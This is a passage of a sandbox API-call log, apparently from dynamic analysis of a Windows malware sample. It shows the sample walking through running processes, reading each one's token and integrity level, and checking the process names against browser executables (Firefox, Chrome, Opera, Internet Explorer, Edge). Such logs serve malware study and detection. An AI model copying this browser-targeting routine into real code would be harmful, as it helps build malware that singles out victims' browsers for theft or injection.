(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0226.850] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0226.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0226.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0226.852] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.852] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.852] GetLastError () returned 0x7a [0226.852] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.852] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.852] CloseHandle (hObject=0x340) returned 1 [0226.852] CloseHandle (hObject=0x548) returned 1 [0226.853] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0226.853] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e9760, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.853] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.853] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.853] GetLastError () returned 0x7a [0226.853] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.853] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.853] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.854] CloseHandle (hObject=0x340) returned 1 [0226.854] CloseHandle (hObject=0x548) returned 1 [0226.854] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0226.854] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0226.854] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0226.854] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0226.854] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0226.854] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0226.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0226.854] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.855] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.855] GetLastError () returned 0x7a [0226.855] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.855] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.855] CloseHandle (hObject=0x340) returned 1 [0226.855] CloseHandle (hObject=0x548) returned 1 [0226.855] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0226.855] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x345d08, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.856] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.856] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.856] GetLastError () returned 0x7a [0226.856] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.856] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.856] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.856] CloseHandle (hObject=0x340) returned 1 [0226.856] CloseHandle (hObject=0x548) returned 1 [0226.857] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0226.857] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0226.857] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0226.857] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0226.857] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0226.857] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0226.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0226.857] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.857] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.857] GetLastError () returned 0x7a [0226.857] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.858] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.858] CloseHandle (hObject=0x340) returned 1 [0226.858] CloseHandle (hObject=0x548) returned 1 [0226.858] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0226.858] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x345ea0, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.858] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.858] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.858] GetLastError () returned 0x7a [0226.859] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.859] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.859] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.859] CloseHandle (hObject=0x340) returned 1 [0226.859] CloseHandle (hObject=0x548) returned 1 [0226.859] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0226.859] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0226.859] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0226.859] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0226.859] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0226.859] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0226.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0226.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0226.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0226.859] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.859] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.859] GetLastError () returned 0x7a [0226.859] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.859] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.859] CloseHandle (hObject=0x340) returned 1 [0226.859] CloseHandle (hObject=0x548) returned 1 [0226.859] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0226.859] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3464e8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.859] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.859] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.859] GetLastError () returned 0x7a [0226.859] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.859] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.859] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.859] CloseHandle (hObject=0x340) returned 1 [0226.859] CloseHandle (hObject=0x548) returned 1 [0226.860] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0226.860] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0226.860] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0226.860] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0226.860] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0226.860] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0226.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0226.860] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.860] GetLastError () returned 0x7a [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.860] CloseHandle (hObject=0x340) returned 1 [0226.860] CloseHandle (hObject=0x548) returned 1 [0226.860] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0226.860] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3469e0, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.860] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.860] GetLastError () returned 0x7a [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.860] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.860] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.860] CloseHandle (hObject=0x340) returned 1 [0226.860] CloseHandle (hObject=0x548) returned 1 [0226.860] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0226.860] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0226.860] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0226.860] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0226.860] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0226.860] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0226.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0226.860] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.860] GetLastError () returned 0x7a [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.860] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.860] CloseHandle (hObject=0x340) returned 1 [0226.860] CloseHandle (hObject=0x548) returned 1 [0226.860] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0226.861] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346af8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.861] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.861] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.861] GetLastError () returned 0x7a [0226.861] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.861] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.861] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.861] CloseHandle (hObject=0x340) returned 1 [0226.861] CloseHandle (hObject=0x548) returned 1 [0226.861] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0226.861] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0226.861] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0226.861] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0226.861] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0226.861] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0226.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0226.861] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.861] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.861] GetLastError () returned 0x7a [0226.861] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.861] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.861] CloseHandle (hObject=0x340) returned 1 [0226.861] CloseHandle (hObject=0x548) returned 1 [0226.861] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0226.861] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346c10, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.861] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.861] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.861] GetLastError () returned 0x7a [0226.861] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.861] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.861] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.861] CloseHandle (hObject=0x340) returned 1 [0226.861] CloseHandle (hObject=0x548) returned 1 [0226.861] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0226.861] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0226.861] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0226.861] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0226.862] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0226.862] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0226.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, 